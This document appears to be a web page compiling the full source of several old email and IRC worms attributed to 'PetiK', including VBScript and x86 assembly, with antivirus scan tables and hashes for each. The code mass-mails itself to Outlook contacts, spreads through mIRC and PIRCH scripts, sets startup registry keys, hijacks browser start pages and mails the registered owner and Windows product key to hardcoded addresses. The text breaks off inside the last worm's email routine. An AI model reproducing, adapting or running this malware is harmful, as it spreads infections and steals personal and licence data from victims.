TheHacker | 6.3.4.1.326 | 2009.05.15 | -
TrendMicro | 8.950.0.1092 | 2009.05.15 | VBS_JUDGE.A
VBA32 | 3.12.10.5 | 2009.05.16 | Email-Worm.Win32.Petik
ViRobot | 2009.5.15.1737 | 2009.05.15 | VBS.Worm-Family
VirusBuster | 4.6.5.0 | 2009.05.16 | VBS.Petik.I

Additional information
File size: 2587 bytes
MD5: 538a05a6e0dd048eae2c3b06338bd5d7
SHA1: fef767df96e3dbeb009d6cd746bee12c33fb3257

' Name     : VBS.Noel
' Author   : PetiK
' Language : VBS
' Date     : 12/12/2000
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")

DEBUT()

Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy("C:\NOEL.GIF.vbs")
EMAIL()
End Sub

Sub EMAIL()
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "JOUYEUX NOEL"
msg.Body = "Voici une photodu PERE NOEL"
msg.Attachments.Add ("C:\NOEL.GIF.vbs")
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End if
Set msg2 = OApp.CreateItem(0)
msg2.BCC = "[email protected]; [email protected]"
nom = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
CN = CreateObject("WScript.NetWork").ComputerName
msg2.Subject = "Message de """ & nom & """ alias " & CN & ""
page = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
PK = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\ProductKey")
msg2.Body = "-IE : """ & page & """ -Produkt Key """ & PK & """"
msg2.Send
End Sub

File NOEL.GIF.vbs received on 05.11.2009 07:04:27 (CET)

Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.05.11 | Email-Worm.Win32.Petik!IK
AhnLab-V3 | 5.0.0.2 | 2009.05.11 | VBS/Petik
AntiVir | 7.9.0.166 | 2009.05.10 | Worm/Petik.J1
Antiy-AVL | 2.0.3.1 | 2009.05.08 | Worm/Win32.Win32
Authentium | 5.1.2.4 | 2009.05.10 | VBS/Petik.M@mm
Avast | 4.8.1335.0 | 2009.05.10 | VBS:MailWorm-gen
AVG | 8.5.0.327 | 2009.05.10 | VBS/VBSWG
BitDefender | 7.2 | 2009.05.11 | Generic.ScriptWorm.A79766E0
CAT-QuickHeal | 10.00 | 2009.05.09 | VBS/Petik.M
ClamAV | 0.94.1 | 2009.05.11 | -
Comodo | 1157 | 2009.05.08 | Worm.Win32.Email-Worm.Petik
DrWeb | 5.0.0.12182 | 2009.05.11 | modification of VBS.Generic.458
eSafe | 7.0.17.0 | 2009.05.10 | -
eTrust-Vet | 31.6.6497 | 2009.05.08 | VBS/Buggy
F-Prot | 4.4.4.56 | 2009.05.10 | VBS/Petik.M@mm
F-Secure | 8.0.14470.0 | 2009.05.11 | Email-Worm.Win32.Petik
Fortinet | 3.117.0.0 | 2009.05.10 | VBS/Petik.J@mm
GData | 19 | 2009.05.11 | Generic.ScriptWorm.A79766E0
Ikarus | T3.1.1.49.0 | 2009.05.11 | Email-Worm.Win32.Petik
K7AntiVirus | 7.10.729 | 2009.05.08 | -
Kaspersky | 7.0.0.125 | 2009.05.11 | Email-Worm.Win32.Petik
McAfee | 5611 | 2009.05.10 | W32/PetTick.vbs
McAfee+Artemis | 5611 | 2009.05.10 | W32/PetTick.vbs
McAfee-GW-Edition | 6.7.6 | 2009.05.11 | Worm.Petik.J1
Microsoft | 1.4602 | 2009.05.10 | Virus:VBS/Petik.J
NOD32 | 4063 | 2009.05.08 | probably unknown SCRIPT
Norman | 6.01.05 | 2009.05.08 | VBS/GenMail.D
nProtect | 2009.1.8.0 | 2009.05.10 | VBS.Petik.B@mm
Panda | 10.0.0.14 | 2009.05.10 | -
PCTools | 4.4.2.0 | 2009.05.07 | VBS.Petik.J
Prevx | 3.0 | 2009.05.11 | -
Rising | 21.29.00.00 | 2009.05.11 | Worm.Hopalong
Sophos | 4.41.0 | 2009.05.11 | VBS/Petik-J
Sunbelt | 3.2.1858.2 | 2009.05.09 | -
Symantec | 1.4.4.12 | 2009.05.11 | VBS.LoveLetter.Var
TheHacker | 6.3.4.1.324 | 2009.05.09 | -
TrendMicro | 8.950.0.1092 | 2009.05.11 | VBS_GENERIC.009
VBA32 | 3.12.10.4 | 2009.05.11 | Email-Worm.Win32.Petik
ViRobot | 2009.5.11.1728 | 2009.05.11 | VBS.Worm-Family
VirusBuster | 4.6.5.0 | 2009.05.10 | VBS.Petik.J

Additional information
File size: 1352 bytes
MD5: fcc75e971157a8d9103b5bc583847f87
SHA1: 2fd63f05fb1a2ee79db2d227f902f94fa12851b5

comment $
W32.TWIN by PetiK, 20/12/2000

TO COMPILE:
tasm32 /M /ML ?????.asm
tlink32 -Tpe -x -aa ?????.obj,,,import32
$
.386
jumps
locals
.model flat, stdcall

;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn ExitProcess:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC

;USER32.dll
extrn MessageBoxA:PROC

;ADVAPI32.dll
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC

.data
fh       dd ?
octets   dd ?
regDisp  dd 0
regResu  dd 0
l        dd 0
p        dd 0
szBAT    db 260 dup (0)
szCopie  db 260 dup (0)
szOrig   db 260 dup (0)
szHTM    db 260 dup (0)
szVBS    db 260 dup (0)
szWin    db 260 dup (0)
Copie    db "\NAV5.exe",00h
BATFILE  db "\IE55.bat",00h
HTMFILE  db "\IE55.htm",00h
VBSFILE  db "\IE55.vbs",00h
Winini   db "\\WIN.INI",00h
run      db "run",00h
windows  db "windows",00h
CLE      db "Software\[PetiK]",00h
CLE2     db "\Software\Microsoft\Internet Explorer\Main",00h
NOM2     db "Start Page",00h

; NOTE: batd / battaille (the IE55.bat contents written at label BAT) are
; referenced below but their definition is not on this page.

vbsd:
db 'rem IE55.vbs pour W32.TWiN',0dh,0ah
db '',0dh,0ah
db 'Dim fso,ws,file',0dh,0ah
db 'Set fso = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set ws = CreateObject("WScript.Shell")',0dh,0ah
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'Set win = fso.GetSpecialFolder(0)',0dh,0ah
db 'Set sys = fso.GetSpecialFolder(1)',0dh,0ah
db 'ws.Run (sys&"\IE55.htm")',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\'
db 'Download Directory","C:\"',0dh,0ah
db 'If fso.FileExists("C:\PlugIE55.exe") Then',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\'
db 'Start Page","http://www.atoutmicro.ca/viralert.htm"',0dh,0ah
db 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\'
db 'PlugIE55","C:\PlugIE55.exe"',0dh,0ah
db 'End If',0dh,0ah
db 'MIRC()',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db 'Sub MIRC()',0dh,0ah
db 'On Error Resume Next',0dh,0ah
db 'If fso.FileExists("C:\mirc\script.ini") Then',0dh,0ah
db ' Set c = (sys&"\NAV5.exe")',0dh,0ah
db ' c.Copy("C:\mirc\XPICTURE.exe")',0dh,0ah
db ' Set srpt = fso.CreateTextFile("C:\mirc\script.ini",true)',0dh,0ah
db ' srpt.WriteLine "[script]"',0dh,0ah
db ' srpt.WriteLine "n0=on 1:JOIN:#:{"',0dh,0ah
db ' srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"',0dh,0ah
db ' srpt.WriteLine "n2= /.dcc send $nick C:\mirc\XPICTURE.exe"',0dh,0ah
db ' srpt.WriteLine "n3=}"',0dh,0ah
db ' srpt.Close',0dh,0ah
db 'End If',0dh,0ah
db 'End Sub',0dh,0ah
vbstaille equ $-vbsd

; The HTML tags of the IE55.htm page were lost when this page was extracted;
; only the text between them survives (the rendered page is shown further down).
htmd:
db '',0dh,0ah
db 'Plugin pour Microsoft Internet Explorer',0dh,0ah
db 'Plugin for Microsoft Internet Explorer',0dh,0ah
db '',0dh,0ah
db 'Merci de télécharger le plugin dans le réperoire C:\',0dh,0ah
db 'Please download the plugin in C:\ path',0dh,0ah
db '',0dh,0ah
htmtaille equ $-htmd

.code
DEBUT:  mov eax, offset CLE             ; Check whether a [PetiK] key
        call REG                        ; exists in HKLM\Software.
        cmp [regDisp],1                 ; If it is not there, the program copies
        jne FIN                         ; itself and then modifies WIN.INI

WCOPIE: push 0
        call GetModuleHandleA
        push 260                        ; The program copies itself into the
        push offset szOrig
        push eax
        call GetModuleFileNameA         ; machine's WINDOWS folder
        push 260
        push offset szCopie             ; under the name NAV5.exe
        call GetWindowsDirectoryA
        push offset Copie
        push offset szCopie
        call lstrcat
        push 0
        push offset szCopie
        push offset szOrig
        call CopyFileA

WIN_INI:push 260                        ; Add an entry to WIN.INI so that
        push offset szWin               ; the program starts at every boot.
        call GetWindowsDirectoryA       ; This avoids the REGISTRY,
        push offset Winini              ; which is too conspicuous.
        push offset szWin
        call lstrcat
        push offset szWin               ; In WIN.INI of the WINDOWS folder:
        push offset szCopie             ; "program name"
        push offset run                 ; run=
        push offset windows             ; [windows]
        call WritePrivateProfileStringA

BAT:    push 260
        push offset szBAT
        call GetSystemDirectoryA
        push offset BATFILE
        push offset szBAT
        call lstrcat
        push 00000000h
        push 00000080h
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset szBAT
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push battaille
        push offset batd
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle

VBS:    push 260                        ; Create a file
        push offset szVBS
        call GetSystemDirectoryA        ; in the SYSTEM directory
        push offset VBSFILE
        push offset szVBS               ; named IE55.VBS
        call lstrcat
        push 00000000h
        push 00000080h
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset szVBS
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push vbstaille
        push offset vbsd
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle

HTM:    push 260                        ; Create a file
        push offset szHTM
        call GetSystemDirectoryA        ; in the SYSTEM directory
        push offset HTMFILE
        push offset szHTM               ; named IE55.HTM
        call lstrcat
        push 00000000h
        push 00000080h
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset szHTM
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push htmtaille
        push offset htmd
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle

BDR:    push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE2
        push 80000001h                  ; HKEY_CURRENT_USER
        call RegCreateKeyExA
        push 05h
        push offset szVBS               ; Create a value in the
        push 01h
        push 0
        push offset NOM2                ; Registry so that the VBS file
        push p
        call RegSetValueExA
        push 0                          ; is launched when the user
        call RegCloseKey                ; goes on the internet
        jmp FIN

REG:    push offset regDisp
        push offset regResu
        push 0                          ; default security descriptor
        push 0F003FH                    ; KEY_ALL_ACCESS
        push 0
        push 0
        push 0
        push eax                        ; address of the subkey
        push 80000002h                  ; HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push [regResu]
        call RegCloseKey
        ret

FIN:    push 0
        call ExitProcess                ; End of program
end DEBUT
IE55.HTM
Plugin pour Microsoft Internet Explorer
Plugin for Microsoft Internet Explorer
Merci de télécharger le plugin dans le réperoire C:\
Please download the plugin in C:\ path
'VBS/mIRC/NetWork.A by PetiK 29/12/2000
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
set file = fso.OpenTextFile(WScript.ScriptFullName,1)
vbscopie = file.ReadAll

DEBUT()

Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
RS = ("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork")
Set c = fso.GetFile(WScript.ScriptFullName)
NetWork = (win&"\Network.vbs")
c.Copy (NetWork)
ws.RegWrite RS,NetWork
'NORTON()
MIRC()
ESPION()
EMAIL()
End Sub

Sub NORTON()
ws.RegDelete ("HKLM\Software\Symantec\")
ws.RegDelete ("HKCU\Software\Symantec\")
End Sub

Sub ESPION()
Set win = fso.GetSpecialFolder(0)
Set A = CreateObject("Outlook.Application")
Set B = A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D = 1 To C.AddressEntries.Count
Set E = C.Addressentries(D)
Next
End If
Next
ComputerName = CreateObject("WScript.NetWork").ComputerName
NOM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
VER = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
NUM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
REC1 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductName")
REC2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
REC3 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
PPDB = ws.RegRead("HKCU\Control Panel\Desktop\Wallpaper")
DDEV = ws.RegRead("HKCU\Control Panel\Desktop\ScreenSaveTimeOut")
PDEM = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
DDIR = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Download Directory")
Set aze = fso.CreateTextFile ("C:\ESPION.txt",true)
aze.WriteLine "Information sur l'ordinateur"
aze.WriteLine "NOM DE L'ORDINATEUR : " & ComputerName
aze.WriteLine "NOM D'UTILISATEUR : " & NOM
aze.WriteLine "NOM DE L'ENTREPRISE : " & ENT
aze.WriteLine "SYSTEME D'EXPLOITAION : " & VER & " " & NUM
aze.WriteLine "NUMERO DE LICENSE : " & REC1 & " " & REC2
aze.WriteLine "NUMERO D'IDENTIFICATION : " & REC3
aze.WriteLine "PAPIER PEINT DE BUREAU : " & PPDB
aze.WriteLine "L'ECRAN DE VEILLE DE DECLENCHE AU BOUT DE " & DDEV & " SECONDES"
aze.WriteLine "NON DANS CARNET D'ADRESSES : " & E.Name
aze.WriteLine "ADDRESSE : " & E.Address
aze.WriteBlankLines(2)
aze.WriteLine "Information sur internet"
aze.WriteLine "LA PAGE DE DEMARRAGE EST : " & PDEM
aze.WriteLine "LE DOSSIER DE TELECHARGEMENT EST : " & DDIR
End Sub

Sub MIRC()
On Error Resume Next
NET2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork")
script = ("C:\script.ini")
Set srpt = fso.CreateTextFile(script, true)
srpt.WriteLine "[script]; par PetiK "
srpt.WriteLine "n0=on 1:JOIN:#:{"
srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"
srpt.WriteLine "n2= /dcc send $nick " & NET2
srpt.WriteLine "n3=}"
srpt.Close
fso.CopyFile script, "C:\mirc\script.ini"
fso.CopyFile script, "C:\mirc32\script.ini"
fso.CopyFile script, "C:\program files\mirc\script.ini"
fso.CopyFile script, "C:\program files\mirc32\script.ini"
fso.DeleteFile ("C:\script.ini")
End Sub

Sub EMAIL()
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "NetWork Game for WINDOWS"
msg.Body = "The new game for your computer arrives"
msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(0),"\Network.vbs")
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End if
Set msg2 = OApp.CreateItem(0)
msg2.BCC = "[email protected]; [email protected]"
msg2.Subject = "Message écrit le " & date
msg2.Body = "Il était " & time
msg2.Attachments.Add ("C:\ESPION.txt")
msg2.Send
fso.DeleteFile ("C:\ESPION.txt")
End Sub

File Network.vbs received on 05.16.2009 17:59:59 (CET)

Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.05.16 | Email-Worm.Win32.Petik!IK
AhnLab-V3 | 5.0.0.2 | 2009.05.16 | VBS/Petik
AntiVir | 7.9.0.168 | 2009.05.15 | Worm/Petik.K1
Antiy-AVL | 2.0.3.1 | 2009.05.15 | Worm/Win32.Petik
Authentium | 5.1.2.4 | 2009.05.16 | VBS/Petik.L@mm
Avast | 4.8.1335.0 | 2009.05.15 | VBS:MailWorm-gen
AVG | 8.5.0.336 | 2009.05.15 | I-Worm/Petik
BitDefender | 7.2 | 2009.05.16 | Generic.ScriptWorm.892F765D
CAT-QuickHeal | 10.00 | 2009.05.15 | VBS/Petik.L
ClamAV | 0.94.1 | 2009.05.16 | Worm.VBS-14
Comodo | 1157 | 2009.05.08 | Worm.Win32.Email-Worm.Petik
DrWeb | 5.0.0.12182 | 2009.05.16 | modification of W97M.Necronom
eSafe | 7.0.17.0 | 2009.05.14 | VBS.Scramble.
eTrust-Vet | 31.6.6508 | 2009.05.16 | VBS/Buggy
F-Prot | 4.4.4.56 | 2009.05.16 | VBS/Petik.L@mm
F-Secure | 8.0.14470.0 | 2009.05.15 | Email-Worm.Win32.Petik
Fortinet | 3.117.0.0 | 2009.05.16 | VBS/PETIK.K1
GData | 19 | 2009.05.16 | Generic.ScriptWorm.892F765D
Ikarus | T3.1.1.49.0 | 2009.05.16 | Email-Worm.Win32.Petik
K7AntiVirus | 7.10.737 | 2009.05.16 | -
Kaspersky | 7.0.0.125 | 2009.05.16 | Email-Worm.Win32.Petik
McAfee | 5616 | 2009.05.15 | VBS/Generic
McAfee+Artemis | 5616 | 2009.05.15 | VBS/Generic
McAfee-GW-Edition | 6.7.6 | 2009.05.15 | Worm.Petik.K1
Microsoft | 1.4602 | 2009.05.16 | Virus:VBS/Petik.K
NOD32 | 4080 | 2009.05.15 | probably unknown SCRIPT
Norman | 6.01.05 | 2009.05.16 | VBS/GenMail.D
nProtect | 2009.1.8.0 | 2009.05.16 | VBS.Petik.C@mm
Panda | 10.0.0.14 | 2009.05.16 | VBS/Generic.worm
PCTools | 4.4.2.0 | 2009.05.16 | VBS.Petik.K
Prevx | 3.0 | 2009.05.16 | -
Rising | 21.29.52.00 | 2009.05.16 | Worm.Hopalong
Sophos | 4.41.0 | 2009.05.16 | VBS/Petik-K
Sunbelt | 3.2.1858.2 | 2009.05.16 | -
Symantec | 1.4.4.12 | 2009.05.16 | VBS.Pet_Tick.gen
TheHacker | 6.3.4.1.326 | 2009.05.15 | -
TrendMicro | 8.950.0.1092 | 2009.05.15 | VBS_PETIK.K1
VBA32 | 3.12.10.5 | 2009.05.16 | -
ViRobot | 2009.5.15.1737 | 2009.05.15 | -

Additional information
File size: 4245 bytes
MD5: af1121c899b152b95520214e4873e466
SHA1: 2201e0075c58deed1db798dcc1c0c9f50d7086db

' Name     : VBS.Kadosh
' Author   : PetiK
' Language : VBS
' Date     : 06/01/2001
' VBS/Kadosh.A by PandaKiller
' This file copies itself into the WINDOWS directory under the name
' WINEXEC.EXE.VBS and into the SYSTEM directory as winRun.dll.vbs
' It changes the web start page and sets it to LIVE.MULTIMANIA.COM
' WARNING: Norton detects this program as the virus VBS.NewLove.A
' THIS IS NOT A VIRUS: IT DESTROYS NOTHING

DEBUT()

Sub DEBUT()
Set a = CreateObject("Scripting.FileSystemObject")
Set win = a.GetSpecialFolder(0)
Set sys = a.GetSpecialFolder(1)
Set c = a.GetFile(WScript.ScriptFullName)
c.Copy(win&"\WinExec.exe.vbs")
c.Copy(sys&"\WinRun.dll.vbs")
INTERNET()
EMAIL()
msgbox "Le tour du monde en 20 jours",vbinformation
End Sub

' CHANGES THE INTERNET START PAGE
Sub INTERNET()
Set W = Wscript.CreateObject("WScript.Shell")
W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "live.multimania.com"
W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinExec", "C:\WINDOWS\WinExec.exe.vbs"
End Sub

' SENDS A COPY OF ITSELF TO EVERY RECIPIENT IN THE ADDRESS BOOK
Sub EMAIL()
Set K = CreateObject("Outlook.Application")
Set L = K.GetNameSpace("MAPI")
For Each M In L.AddressLists
If M.AddressEntries.Count <> 0 Then
Set N = K.CreateItem(0)
For O = 1 To M.AddressEntries.Count
Set P = M.AddressEntries(O)
If O = 1 Then
N.BCC = P.Address
Else
N.BCC = N.BCC & "; " & P.Address
End If
Next
N.Subject = "Le Tour du Monde"
N.Body = "Voici une lettre qui va faire le tour du monde. Ouvre Vite"
Set Q = CreateObject("Scripting.FileSystemObject")
N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"WinExec.exe.vbs")
N.Send
End If
Next
End Sub

File WinExec.exe.vbs received on 05.11.2009 07:14:12 (CET)

Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.05.11 | Email-Worm.Win32.Petik!IK
AhnLab-V3 | 5.0.0.2 | 2009.05.11 | -
AntiVir | 7.9.0.166 | 2009.05.10 | Worm/Petik.05
Antiy-AVL | 2.0.3.1 | 2009.05.08 | Worm/Win32.Win32
Authentium | 5.1.2.4 | 2009.05.10 | VBS/Petik.W@mm
Avast | 4.8.1335.0 | 2009.05.10 | VBS:MailWorm-gen
AVG | 8.5.0.327 | 2009.05.10 | I-Worm/Petik
BitDefender | 7.2 | 2009.05.11 | Generic.ScriptWorm.EDFACDDC
CAT-QuickHeal | 10.00 | 2009.05.09 | VBS/Petik.W
ClamAV | 0.94.1 | 2009.05.11 | -
Comodo | 1157 | 2009.05.08 | Worm.Win32.Email-Worm.Petik
DrWeb | 5.0.0.12182 | 2009.05.11 | WORM.Virus
eSafe | 7.0.17.0 | 2009.05.10 | -
eTrust-Vet | 31.6.6497 | 2009.05.08 | VBS/Sodak
F-Prot | 4.4.4.56 | 2009.05.10 | VBS/Petik.W@mm
F-Secure | 8.0.14470.0 | 2009.05.11 | Email-Worm.Win32.Petik
Fortinet | 3.117.0.0 | 2009.05.10 | VBS/Petik.M@mm
GData | 19 | 2009.05.11 | Generic.ScriptWorm.EDFACDDC
Ikarus | T3.1.1.49.0 | 2009.05.11 | Email-Worm.Win32.Petik
K7AntiVirus | 7.10.729 | 2009.05.08 | VBS.Generic.MassMailer
Kaspersky | 7.0.0.125 | 2009.05.11 | Email-Worm.Win32.Petik
McAfee | 5611 | 2009.05.10 | VBS/Generic@MM
McAfee+Artemis | 5611 | 2009.05.10 | VBS/Generic@MM
McAfee-GW-Edition | 6.7.6 | 2009.05.11 | Worm.Petik.05
Microsoft | 1.4602 | 2009.05.10 | Virus:VBS/Petik.L
NOD32 | 4063 | 2009.05.08 | probably unknown SCRIPT
Norman | 6.01.05 | 2009.05.08 | VBS/Autorun.AP
nProtect | 2009.1.8.0 | 2009.05.10 | VBS.Petik.D@mm
Panda | 10.0.0.14 | 2009.05.10 | -
PCTools | 4.4.2.0 | 2009.05.07 | VBS.Petik.L
Prevx | 3.0 | 2009.05.11 | -
Rising | 21.29.00.00 | 2009.05.11 | Worm.Hopalong
Sophos | 4.41.0 | 2009.05.11 | VBS/Petik-L
Sunbelt | 3.2.1858.2 | 2009.05.09 | -
Symantec | 1.4.4.12 | 2009.05.11 | VBS.LoveLetter.Var
TheHacker | 6.3.4.1.324 | 2009.05.09 | -
TrendMicro | 8.950.0.1092 | 2009.05.11 | VBS_GENERIC.001
VBA32 | 3.12.10.4 | 2009.05.11 | Email-Worm.Win32.Petik
ViRobot | 2009.5.11.1728 | 2009.05.11 | VBS.Worm-Family
VirusBuster | 4.6.5.0 | 2009.05.10 | VBS.Petik.L

Additional information
File size: 1683 bytes
MD5: 763d1411edc603a60b7fdd2f63d77579
SHA1: 98fede0c3a54c7c3fd8261b44b27107f91f4fc49

' Name     : VBS.ShowVar
' Author   : PetiK
' Language : VBS
' Date     : 17/01/2001
' Copy itself to %WINDIR%\Showvar.vbs
' Add to registry HKLM\Software\Microsoft\Windows\CurrentVersion\Run
'   Showvar = %WINDIR%\Showvar.vbs
' Spread with mIRC by writing a script.
' Spread via PIRCH.
' Spread via mail :
'   Subject : "Salut l'ami. Ouvre vite, la chance peut tourner !!"
'   No file attached: the code of the worm is directly in the HTML code of
'   the mail. It creates a VBS file in the WINDIR directory and runs it.
' When the day is the 5th, a message box is shown.

'ShowVar by PetiK 21/01/2000
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(WScript.ScriptFullName,1)
vbscopie = file.ReadAll

DEBUT()

Sub DEBUT()
On Error Resume Next
Set win = fso.GetspecialFolder(0)
RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
Set c = fso.GetFile(WScript.ScriptFullName)
ShowVar = (win&"\Showvar.vbs")
c.Copy (ShowVar)
ws.RegWrite RUN,ShowVar
If ws.RegRead ("HKCU\Software\ShowVar\MIRC") <> "1" then
Mirc ""
End If
If ws.RegRead ("HKCU\Software\ShowVar\PIRCH") <> "1" then
Pirch ""
End If
if ws.regread ("HKCU\Software\ShowVar\MAIL") <> "1" then
EMail()
End If
Divers()
End Sub

Function Mirc(Path)
'On Error Resume Next
If Path = "" Then
If fso.fileexists("c:\mirc\mirc.ini") Then Path = "c:\mirc"
If fso.fileexists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32"
PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
SV2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
If fso.fileexists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "\script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & SV2
Script.writeline "n3=}"
Script.Close
ws.RegWrite "HKCU\Software\ShowVar\MIRC", "1"
End If
End Function

Function Pirch(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.fileexists("c:\pirch\Pirch32.exe") Then path = "c:\pirch"
If fso.fileexists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32"
pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
SV3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
If fso.fileexists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "\events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine "Level2=100-Level 100"
Script.WriteLine "100-Level 100Enabled=1"
Script.WriteLine "Level3=200-Level 200"
Script.WriteLine "200-Level 200Enabled=1"
Script.WriteLine "Level4=300-Level 300"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine "400-Level 400Enabled=1"
Script.WriteLine "Level6=500-Level 500"
Script.WriteLine "500-Level 500Enabled=1"
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[100-Level 100]"
Script.WriteLine "User1=*!*@*"
Script.WriteLine "UserCount=1"
Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " & SV3
Script.WriteLine "EventCount=1"
Script.WriteLine ""
Script.WriteLine "[200-Level 200]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[300-Level 300]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[400-Level 400]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[500-Level 500]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.Close
End If
ws.RegWrite "HKCU\Software\ShowVar\PIRCH", "1"
End Function

Function EMail()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) & "&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "
' (the remainder of this function, an HTML string, is cut off on this page)
